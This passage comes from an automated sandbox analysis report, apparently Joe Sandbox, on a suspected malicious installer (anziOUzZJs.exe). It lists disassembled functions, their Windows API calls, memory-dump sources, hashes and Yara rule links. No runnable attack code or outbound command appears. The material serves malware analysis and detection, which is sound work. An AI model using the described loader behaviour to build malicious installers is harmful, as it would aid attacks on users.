                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                      • Instruction ID: 4327eab70650ef0c96a691b493921a8ab8e5ba0d824f916f670fcb6a13d6a8f8
                                      • Opcode Fuzzy Hash: 5bfff9db2859b877ca6a77ec9405565887134ef839be144d68b3806b8d7c08ac
                                      • Instruction Fuzzy Hash: 11816671D04228DBDF24CFA8C8447ADBBB1FB44315F2181AED856BB281C7786A96DF44
                                      Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                      • Instruction ID: 63ee65aff5d1ea53a99bb7455827a561e54e570c364fe5978cc4b9ff32097947
                                      • Opcode Fuzzy Hash: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
                                      • Instruction Fuzzy Hash: E9711271D04228CBDF24CFA8C8547ADBBF1FB48305F15806AD856BB281D7786A96DF44
                                      Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                      • Instruction ID: 2ec41c1936be718984cf19d05ce660ecedc56656b80368bbb2ce29215557a5c8
                                      • Opcode Fuzzy Hash: 83d4d9fa97144311a3e66a470cde7927608ab55fe6dc8c436fded4a10c430ead
                                      • Instruction Fuzzy Hash: 53712571E04228CBDF28CF98C854BADBBB1FB44305F15816ED856BB281C7785996DF44
                                      Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                      • Instruction ID: 94740bf10ed9628fc2a816943eb7322e71ed29eec5e37d1a6fe0f7c23d4f3e83
                                      • Opcode Fuzzy Hash: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
                                      • Instruction Fuzzy Hash: 1D714571E04228CBDF28CF98C854BADBBB1FB44305F11806ED856BB281C7786A96DF44
                                      Function 00401B23 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                      • GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree
                                      • String ID: CreateTimer
                                      • API String ID: 3394109436-4043936699
                                      • Opcode ID: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
                                      • Instruction ID: 3d889d12a0135df13ad9dc84ed8322f06a4567648c243a49bcaf602cfbc5661a
                                      • Opcode Fuzzy Hash: 6d590f43eb69b2c4634e3aaa82c59157183b08f5ad10ff4766659c2d74b3500e
                                      • Instruction Fuzzy Hash: 9721C376604301ABDB10EB95DE84A5F73B9EB48314720853BF202B32D5D778E8119F6E
                                      Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                        • Part of subcall function 0040548A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                        • Part of subcall function 0040548A: CloseHandle.KERNEL32(?), ref: 004054C0
                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                      • String ID:
                                      • API String ID: 3521207402-0
                                      • Opcode ID: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
                                      • Instruction ID: 49f7d359c4d218189077cc8fb8a526ed56d4096950e75cb47e310611910bd6fc
                                      • Opcode Fuzzy Hash: 6f417624348e7a4d8987f4dc8f5a8d32866f9ac343c01c93fb87d8a6b3917473
                                      • Instruction Fuzzy Hash: C4016D31904104EBDF11AFA1C984A9E77B2EF00354F10817BFA01B52E1C7785A85AB9A
                                      Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
                                      • Instruction ID: 5ce6926f2417f3d17e5e854e85a0bcf64bccf2bfa1e8e40673093317e398bbc6
                                      • Opcode Fuzzy Hash: 43fdcb12208ecf4b22dbb00b887fd4ca96f50bb9be14fb34037b2d673bee9bdf
                                      • Instruction Fuzzy Hash: A711A771905205EFDF14DF64C6889AEBBB4EF11349F20843FE541B62C0D2B84A85DB5A
                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                      • Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
                                      • Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
                                      • Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                      Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValue
                                      • String ID:
                                      • API String ID: 849931509-0
                                      • Opcode ID: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
                                      • Instruction ID: 0b8f6a46cfbad05769843233fc9109b41d2ceb5d24a7fa4f39b64bc1fd674853
                                      • Opcode Fuzzy Hash: bac01e1814f4caa420f9743e48035a2343af4fd9601bd9a3d86b447afdead7f5
                                      • Instruction Fuzzy Hash: CDF04473A00110ABDB10BFA48A4EAAE72799B50345F14443BF201B61C1D9BD4D12966D
                                      Function 00404FE4 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00404FF4
                                        • Part of subcall function 00403F2A: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      • OleUninitialize.OLE32(00000404,00000000), ref: 00405040
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitialize
                                      • String ID:
                                      • API String ID: 2896919175-0
                                      • Opcode ID: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
                                      • Instruction ID: 217987375aced081d1e1e684f869fbcf2dfeeb51b4bb814d2c2c1d189237c18b
                                      • Opcode Fuzzy Hash: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
                                      • Instruction Fuzzy Hash: 06F0F6F2904202A7DB605F109C0071A77B4DBD4346F40403EFE04722A0D67E89428A9D
                                      Function 0040155B Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00010472), ref: 00401579
                                      • ShowWindow.USER32(0001046C), ref: 0040158E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
                                      • Instruction ID: 6a1362a081380b38d7ea923c07575874152cb2511cc7df5c202f84d8e6e7dbc6
                                      • Opcode Fuzzy Hash: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
                                      • Instruction Fuzzy Hash: AEF0E577B182806FDB25DB74EE8086E7BF6DB9531075901BFD101A3591C2B89C08D728
                                      Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                        • Part of subcall function 00406024: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                        • Part of subcall function 00406024: wsprintfA.USER32 ref: 00406074
                                        • Part of subcall function 00406024: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                      • Instruction ID: f390ed2799c289b087c769a87f24dfac638062b8da6604b2acd18c4b1555f769
                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                      • Instruction Fuzzy Hash: B4E08632644111A6D320A7709D0493B72EC9E84710302483EF906F2191D738AC259669
                                      Function 0040596C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                      • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                      • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                      • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                      Function 00405947 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(?,?,0040555F,?,?,00000000,00405742,?,?,?,?), ref: 0040594C
                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405960
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                      • Instruction ID: 96e5362f07f59601f7516fe8bcac2aa0a8151a45168581d09323fa3b8cc485cf
                                      • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                      • Instruction Fuzzy Hash: F7D01272908121AFC2102738ED0C89BBF65EB543717058B35FDB9F22F0D7304C568AA6
                                      Function 00405455 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
